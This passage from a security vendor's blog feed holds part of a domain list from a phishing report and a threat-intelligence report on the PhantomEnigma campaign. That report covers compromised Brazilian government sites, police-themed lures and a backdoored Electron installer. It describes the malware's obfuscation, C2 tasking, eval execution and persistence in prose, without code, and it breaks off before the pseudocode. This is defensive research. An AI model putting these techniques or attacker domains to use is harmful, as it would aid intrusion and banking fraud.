<li>guardextion[.]online&nbsp;&nbsp;</li>



<li>prowebsitemakers[.]de&nbsp;&nbsp;</li>



<li>onlinebrandinghub[.]de&nbsp;&nbsp;</li>



<li>onsite-developments[.]net&nbsp;&nbsp;</li>



<li>functionalityfirst[.]de&nbsp;&nbsp;</li>



<li>buildyouronlineidentity[.]de&nbsp;&nbsp;</li>



<li>flexievolve[.]de&nbsp;&nbsp;</li>



<li>cloud-microsoft-drive-for-business[.]workers[.]dev&nbsp;&nbsp;</li>



<li>&nbsp;onlineidentityperfection[.]de&nbsp;&nbsp;</li>



<li>guardwebsolutions[.]de&nbsp;&nbsp;</li>



<li>securedecisionmaking[.]de&nbsp;&nbsp;</li>



<li>modernwebbalance[.]de&nbsp;&nbsp;</li>



<li>marketadaptabletech[.]de&nbsp;&nbsp;</li>



<li>waschmaschinenmarkt[.]de&nbsp;&nbsp;</li>



<li>txatvrk[.]net&nbsp;&nbsp;</li>



<li>hbaknoxvillecom[.]top&nbsp;&nbsp;</li>



<li>brandswithintegrity[.]de&nbsp;&nbsp;</li>



<li>turnideastoresults[.]de&nbsp;&nbsp;</li>



<li>wellpults[.]com&nbsp;&nbsp;</li>



<li>navigatingdigitalchange[.]de&nbsp;&nbsp;</li>



<li>qualityfirstonline[.]de&nbsp;&nbsp;</li>



<li>brandtrustmasters[.]de&nbsp;&nbsp;</li>



<li>theconsistencyfactor[.]de&nbsp;&nbsp;</li>



<li>reliablebusinesstech[.]de&nbsp;&nbsp;</li>



<li>performancereputation[.]de&nbsp;&nbsp;</li>



<li>dewdhurstlobl[.]com&nbsp;&nbsp;</li>



<li>securedecisionmakers[.]de&nbsp;&nbsp;</li>



<li>scalableadapt[.]de&nbsp;&nbsp;</li>



<li>trustinbrands[.]de&nbsp;</li>
</ul>
<p>The post <a href="https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/">Kali365 Targets US Organizations with Data Theft via Device Code Phishing </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hidden Infrastructure Exposed: ANY.RUN Reveals Hijacked Gov Websites Delivering Malware </title>
		<link>https://any.run/cybersecurity-blog/phantomenigma-research/</link>
					<comments>https://any.run/cybersecurity-blog/phantomenigma-research/#respond</comments>
		
		<dc:creator><![CDATA[ShiFu]]></dc:creator>
		<pubDate>Thu, 16 Jul 2026 08:51:30 +0000</pubDate>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22131</guid>

					<description><![CDATA[<p>An&#160;original&#160;threat&#160;intelligence investigation&#160;uncovering how trusted government infrastructure became&#160;an&#160;attack channel, placing banking organizations&#160;and public-sector systems at risk while revealing previously undocumented infrastructure relationships&#160;and actionable mitigation guidance for security leaders.&#160; ANY.RUN analysts have uncovered an active PhantomEnigma campaign abusing compromised government infrastructure and fake police-themed documents to target banking and public-sector organizations in Brazil. Trusted emails and legitimate [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/phantomenigma-research/">Hidden Infrastructure Exposed: ANY.RUN Reveals Hijacked Gov Websites Delivering Malware </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><em>An&nbsp;original&nbsp;threat&nbsp;intelligence investigation&nbsp;uncovering how trusted government infrastructure became&nbsp;an&nbsp;attack channel, placing banking organizations&nbsp;and public-sector systems at risk while revealing previously undocumented infrastructure relationships&nbsp;and actionable mitigation guidance for security leaders.</em>&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> analysts have uncovered an active PhantomEnigma campaign abusing compromised government infrastructure and fake police-themed documents to target banking and public-sector organizations in Brazil. Trusted emails and legitimate .gov.br links are helping the operation stay hidden.</p>



<p class="wp-block-paragraph">By linking hundreds of&nbsp;seemingly unrelated&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox&nbsp;analyses</a>, the team exposed a coordinated operation that can&nbsp;delay containment, increase investigation costs,&nbsp;and raise the risk of fraud, data exposure,&nbsp;and operational disruption.&nbsp;</p>



<h2 class="wp-block-heading">Key Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>PhantomEnigma&nbsp;uses compromised Brazilian&nbsp;government systems for delivery:&nbsp;</strong>At least&nbsp;20 .gov.br municipal&nbsp;and police portals were used to distribute malware, while compromised mailboxes allowed phishing emails to pass SPF, DKIM,&nbsp;and DMARC checks. These government systems are part of the delivery chain, not confirmed campaign targets.&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a><strong> analysts uncovered a previously undocumented backdoor generation:</strong> A fresh <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox detonation</a> on July 12, 2026, confirmed the behavior in a live environment, showing that PhantomEnigma operates at least two beacon generations.</li>
</ul>



<ul class="wp-block-list">
<li><strong>The Ofício-PC quishing activity is linked to the same operator:</strong> The fake Polícia Civil QR-code PDF and ClickFix campaign included 99 sandbox analyses. At least four compromised government hosts delivered both Ofício-PC content and PhantomEnigma installers, supporting the assessment that it is another arm of the same operation.</li>
</ul>



<ul class="wp-block-list">
<li><strong>ANY.RUN exposed hidden infrastructure links, while the campaign’s code proved to be its most durable fingerprint:</strong> A recurring Delphi/Inno Setup and Node.js/Electron build chain identified 231 sandbox analyses even as domains, IP addresses, and delivery hosts changed.</li>
</ul>



<!-- CTA Split START -->
<div class="cta-split">
<div class="cta__split-left">

<!-- Image -->
<img decoding="async" loading="lazy" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/595х935.png" alt="PhantomEnigma Threat Report from ANY.RUN" class="cta__split-icon">
</div>

<div class="cta__split-right">
<div>

<!-- Heading -->
<h3 class="cta__split-heading"><br>PhantomEnigma Threat Report</h3>

<!-- Text -->
<p class="cta__split-text">
Discover how one operation abused trusted infrastructure to evade detection:
 </p><ul>
    <li><strong>20+ government websites</strong> hijacked</li>
    <li><strong>Banking and public-sector</strong> organizations targeted</li>
    <li><strong>Live </strong>  backdoor activity still evading detection</li>
  </ul>
<br>

</div>
<!-- CTA Link -->
<a target="_blank" rel="noopener" id="article-banner-split" href="https://files.any.run/images/phantomEnigma_anyrun_report.pdf"><div class="cta__split-link">Get FREE report</div></a>
</div>
</div>
<!-- CTA Split END -->
<!-- CTA Split Styles START -->
<style>
.cta-split {
overflow: hidden;
margin: 3rem 0;
display: grid;
justify-items: center;
border-radius: 0.5rem;
width: 100%;
min-height: 25rem;
grid-template-columns: repeat(2, 1fr);
border: 1px solid rgba(75, 174, 227, 0.32);
font-family: 'Catamaran Bold';
}

.cta__split-left {
display: flex;
align-items: center;
justify-content: center;
height: 100%;
width: 100%;
background-color: #161c59;
background-position: center center;
background: rgba(32, 168, 241, 0.1);
}

.cta__split-icon { 
width: 100%;
height: auto;
object-fit: contain;
max-width: 100%;
}

.cta__split-right {
display: flex;
flex-direction: column;
justify-content: space-between;
padding: 2rem;
}

.cta__split-heading { font-size: 1.5rem; }

.cta__split-text {
margin-top: 1rem;
font-family: Lato, Roboto, sans-serif;
}

.cta__split-link {
padding: 0.5rem 1rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: white;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
display: block;
z-index: 1000;
position: relative;
cursor: pointer !important;
}

.cta__split-link:hover {
background-color: #68CBFF;
color: white;
cursor: pointer;
}

.highlight { color: #ea2526;}


/* Mobile styles START */
@media only screen and (max-width: 768px) {

.cta-split {
grid-template-columns: 1fr;
min-height: auto;
}

.cta__split-left {
height: auto;
min-height: 10rem;
}


.cta__split-left, .cta__split-right {
height: auto;
}

.cta__split-heading { font-size: 1.2rem; }

.cta__split-text { font-size: 1rem; }
.cta__split-icon {
max-height: auto;
object-fit: cover;
}

}
/* Mobile styles END */
</style>
<!-- CTA Split Styles END -->



<h2 class="wp-block-heading">PhantomEnigma&nbsp;Threat&nbsp;Profile&nbsp;</h2>



<p class="wp-block-paragraph">The profile below summarizes&nbsp;PhantomEnigma’s&nbsp;targeting, capabilities, scale,&nbsp;and potential business impact. It also shows why the operation is difficult to detect: it combines modular malware,&nbsp;frequently rotated infrastructure,&nbsp;and compromised government systems that make malicious activity appear legitimate.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-347"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="12"
           data-wpID="347"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-EEF6FF"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Parameter                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-EEF6FF"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Threat type                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Modular Node.js backdoor delivered by a Delphi/Inno Setup installer; multi-arm crimeware operation                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Family / cluster                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        PhantomEnigma, also known as Operation Phantom Enigma                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Actor / targeting                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Brazil-focused activity targeting banking organizations, including Banco do Brasil, with compromised .gov.br infrastructure later used for delivery                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Severity                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        High: active malware delivery, banking credential theft, and compromised government infrastructure                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Business risk                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Financial loss, sensitive data exposure, operational disruption, regulatory and reputational damage, and higher investigation and recovery costs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Sophistication                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Capable: patched Electron decoy, self-deobfuscating index.js, modular eval/exec backdoor, and compromised infrastructure that allows SPF, DKIM, and DMARC checks to pass                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Prevalence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        231 sandbox analyses from January to July 2026. Activity remains ongoing, with peaks in March (58) and May (66), and 27 analyses in July                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        First / last seen in the ANY.RUN dataset                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        January 15, 2026–July 10, 2026                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Overall confidence                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        High confidence that the campaign is real, documented, and focused on Brazil; medium-high confidence that the specific Inno/Node.js arm belongs to PhantomEnigma                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Attribution basis                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Build-chain analysis and vendor corroboration, including PT-ESC research, abuse.ch ThreatFox, and exact seed IOCs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Snapshot                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Core data updated July 11, 2026; deep analysis and live re-detonation completed July 12; Ofício delivery-arm analysis updated July 13                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-347'>
table#wpdtSimpleTable-347{ table-layout: fixed !important; }
table#wpdtSimpleTable-347 td, table.wpdtSimpleTable347 th { white-space: normal !important; }
.wpdt-bc-EEF6FF { background-color: #EEF6FF !important;}
</style>




<h2 class="wp-block-heading">One Campaign, Multiple Attack Arms&nbsp;</h2>



<p class="wp-block-paragraph">The activity&nbsp;first appeared to be&nbsp;two separate waves:&nbsp;Ofício-PC PDF attacks from January to April, followed by a Node.js/Inno campaign from May. However, the data shows both were active in parallel.&nbsp;</p>



<p class="wp-block-paragraph">The PDF arm peaked in February, while the Node.js/Inno backdoor remained active from January through July, with peaks in March and May. This suggests PhantomEnigma is one coordinated operation using several attack arms, shared compromised government infrastructure, and rotating C2 systems.</p>



<h2 class="wp-block-heading">How&nbsp;PhantomEnigma&nbsp;Became Harder to Detect: Timeline&nbsp;and Evolution&nbsp;</h2>



<p class="wp-block-paragraph">The timeline shows&nbsp;PhantomEnigma&nbsp;as one continuous operation. Gen A covers the extension-banker activity documented in public research in 2025. Gen B covers the 2026 activity&nbsp;observed&nbsp;directly in&nbsp;ANY.RUN, including the PDF delivery arm&nbsp;and the Node.js/Inno backdoor cluster. Although these were initially treated as separate phases, the data shows that they&nbsp;operated&nbsp;in parallel during the first half of 2026.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-1024x576.png" alt="PhantomEnigma timeline" class="wp-image-22132" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-2048x1152.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/timeline-740x416.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Timeline of PhantomEnigma&#8217;s malicious activity</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The campaign evolved along two main paths:&nbsp;</p>



<p class="wp-block-paragraph"><strong>Target:</strong> In 2025, the activity focused on banking targets, including Banco do Brasil. By 2026, the operator was using compromised Brazilian public-sector email and hosting infrastructure. This reflects a change in delivery rather than a confirmed new victim group. Legitimate .gov.br systems gave the attackers a more trusted route to victims and helped malicious emails pass standard authentication checks.</p>



<p class="wp-block-paragraph"><strong>Arsenal:</strong> The malware evolved from a browser-extension banker into a modular Inno/Node.js backdoor built around a patched Boostnote application. The download script became simpler, the decoy looked more legitimate, and the backdoor gained the ability to execute JavaScript or deliver additional files. Multiple beacon generations also remained active at the same time, using both GET and POST requests.</p>



<p class="wp-block-paragraph">For security teams, these changes increase the risk of delayed detection&nbsp;and incomplete containment. Trusted infrastructure can&nbsp;reduce suspicion, modular payloads can&nbsp;change after the&nbsp;initial&nbsp;infection,&nbsp;and weekly C2 rotation can&nbsp;quickly make static blocklists outdated.&nbsp;Behavior-based detection,&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox&nbsp;analysis</a>,&nbsp;and continuous&nbsp;threat&nbsp;hunting are therefore more reliable than&nbsp;individual domains, hashes, or automated verdicts alone.&nbsp;</p>



<h2 class="wp-block-heading">PhantomEnigma&nbsp;Targeting: What the Data Really Shows&nbsp;</h2>



<p class="wp-block-paragraph">Submitter data can&nbsp;indicate&nbsp;where activity is being&nbsp;observed, but it does not confirm individual victims. The figures may be affected by MSSP resubmissions, automated feeds,&nbsp;and the&nbsp;ANY.RUN&nbsp;user base.&nbsp;</p>



<p class="wp-block-paragraph">Key findings include:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Brazil is the strongest targeting signal:&nbsp;</strong>It&nbsp;represents&nbsp;60.3% of&nbsp;the .gov.br delivery cluster&nbsp;and 46% of the operator C2 cohort.&nbsp;</li>



<li><strong>Banking&nbsp;and MSSPs show the highest exposure:</strong>&nbsp;This aligns with public research documenting attacks against Banco do&nbsp;Brasil.&nbsp;</li>



<li><strong>The&nbsp;apparent&nbsp;US concentration is misleading:&nbsp;</strong>Of the 77 US submissions, 66 came from one US telecommunications source&nbsp;and should not be treated as separate victims.&nbsp;</li>



<li><strong>Adjacent clusters show different targeting patterns:</strong>&nbsp;The&nbsp;Eoto&nbsp;ClickFix&nbsp;and GitHub-to-StealC&nbsp;activity is not concentrated in Brazil, supporting its classification as separate operations.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">How&nbsp;PhantomEnigma&nbsp;Turns Detection Gaps into Business Risk&nbsp;</h2>



<p class="wp-block-paragraph">PhantomEnigma’s use of trusted government infrastructure, clean-looking samples, and rotating C2 domains can delay investigation and give the operation more time to spread inside an organization.</p>



<p class="wp-block-paragraph">The&nbsp;main business&nbsp;risks include:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Financial loss:</strong>&nbsp;Compromised banking, email, or system credentials can&nbsp;enable fraud&nbsp;and unauthorized transactions.&nbsp;</li>



<li><strong>Delayed containment:</strong>&nbsp;Clean&nbsp;verdicts&nbsp;and fragmented alerts can&nbsp;hide the fact that several incidents belong to one coordinated operation.&nbsp;</li>



<li><strong>Sensitive data exposure:</strong>&nbsp;The modular backdoor can&nbsp;collect system information, execute commands,&nbsp;and deliver&nbsp;additional&nbsp;payloads.&nbsp;</li>



<li><strong>Operational disruption:</strong>&nbsp;A successful compromise can&nbsp;affect employee access, critical systems,&nbsp;and daily business operations.&nbsp;</li>



<li><strong>Higher response costs:</strong>&nbsp;Repeated&nbsp;analysis, longer investigations,&nbsp;and late containment increase SOC workload&nbsp;and recovery expenses.&nbsp;</li>



<li><strong>Regulatory&nbsp;and reputational damage:</strong>&nbsp;Delayed detection&nbsp;and data exposure can&nbsp;affect compliance obligations, customer trust,&nbsp;and partner confidence.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">For security leaders, the priority is to shorten the time between the first suspicious signal&nbsp;and confirmed compromise. This requires connecting&nbsp;behavior&nbsp;across files, infrastructure,&nbsp;and&nbsp;sandbox&nbsp;analyses instead of relying only on individual hashes, domains, or automated verdicts.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Expose hidden links before clean verdicts delay containment.</span><br>
Reduce investigation and recovery costs with ANY.RUN.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phantomenigma-research&#038;utm_term=160726&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Lower Incident Costs  </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Execution Chain: How the&nbsp;PhantomEnigma&nbsp;Attack Unfolds&nbsp;</h2>



<p class="wp-block-paragraph">After&nbsp;analyzing the phishing email inside&nbsp;ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>, we revealed the following attack chain:&nbsp;</p>



<p class="wp-block-paragraph"><strong>Initial delivery</strong>&nbsp;<br>The victim receives a spoofed Polícia Civil or “Procuração&nbsp;Digital” notary email&nbsp;and follows a link to a compromised government host or a police-themed&nbsp;typosquat&nbsp;.com domain.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-1024x579.png" alt="" class="wp-image-22179" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-1536x869.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-2048x1158.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-16-at-10.48.34-740x418.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing email analyzed inside ANY.RUN sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Installer execution</strong><br>The host serves a Delphi-compiled Inno Setup installer, such as Procuracao_Digital.exe. Once executed, it silently unpacks a patched Electron/Boostnote or another JavaScript-based application.</p>



<p class="wp-block-paragraph"><strong>Backdoor activation</strong><br>In the observed Boostnote version, the legitimate BoostIO note-taking application contains a malicious index.js file. The Electron host loads this script, which self-deobfuscates, sends victim system information to the C2 server, performs reconnaissance through child_process, creates persistence through a Run key, and enters its taskExecute loop.</p>



<p class="wp-block-paragraph"><strong>Second-stage delivery</strong><br>The server can return JavaScript for in-process execution through eval() or send an executable to be dropped and launched as a child process. This modular second stage is where the final payload, such as a stealer, loader, or remote management tool, is delivered.</p>



<h3 class="wp-block-heading">Indicators That Survive Lure Changes&nbsp;</h3>



<p class="wp-block-paragraph">Several artifacts&nbsp;remain&nbsp;visible even as file names&nbsp;and lures change:&nbsp;</p>



<ul class="wp-block-list">
<li>The dropped Electron host appears as App.exe under is-*.tmp\&lt;Name&gt;Application\, including names such as DistroniceApplication and SmartSuiteifyUltraWare.</li>



<li>The decoy binary is a patched Boost Note.exe, later renamed Grape.exe to avoid the known decoy string. Installation directories use random word combinations such as UltraSuiteSmartCoreware and ProSoftxUltraToolator.</li>
</ul>



<h2 class="wp-block-heading">Inside the Backdoor: Static&nbsp;Deobfuscation&nbsp;and Live Re-Detonation&nbsp;</h2>



<p class="wp-block-paragraph">This investigation revealed backdoor behavior that we found was not documented in previous public research. To validate it, <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> analysts completed two controlled steps: extracting and deobfuscating the dropped index.js file, then re-detonating the original installer to confirm the behavior in a live sandbox environment.</p>



<p class="wp-block-paragraph">First,&nbsp;analysts recovered the real resources\app\index.js file, measuring 239,459 bytes, from the&nbsp;anchor session’s full JSON report. The file was extracted with 7-Zip&nbsp;and&nbsp;deobfuscated&nbsp;in Python without being executed&nbsp;through Node.js or&nbsp;eval().&nbsp;</p>



<p class="wp-block-paragraph">The analysis reversed two layers of obfuscation. The Boostnote wrapper used an obfuscator.io string array with a custom lowercase-first Base64 alphabet, while the malicious strings were stored as character-code arrays and decoded through String.fromCharCode(&#8230;).</p>



<p class="wp-block-paragraph">This build also differed from the generation described in earlier public research. It did not&nbsp;contain&nbsp;the 1874371588 XOR scheme or the&nbsp;laravel&nbsp;string,&nbsp;indicating&nbsp;a simpler but distinct version of the backdoor.&nbsp;</p>



<p class="wp-block-paragraph">The&nbsp;deobfuscated&nbsp;logic showed that the malware:&nbsp;</p>



<ul class="wp-block-list">
<li>Sends system information to the /nbw/ endpoint&nbsp;</li>



<li>Creates a persistent eight-character machine ID in %APPDATA%&nbsp;</li>



<li>Reads&nbsp;an&nbsp;affiliate or campaign tag stored beside the installer&nbsp;</li>



<li>Checks for new commands every 180 seconds&nbsp;</li>



<li>Executes JavaScript directly&nbsp;through&nbsp;eval()&nbsp;</li>



<li>Drops&nbsp;and runs executable files&nbsp;</li>



<li>Establishes persistence&nbsp;through&nbsp;setLoginItemSettings&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The&nbsp;deobfuscated&nbsp;backdoor, shown in simplified pseudocode:&nbsp;</p>


<div class="wp-block-image">
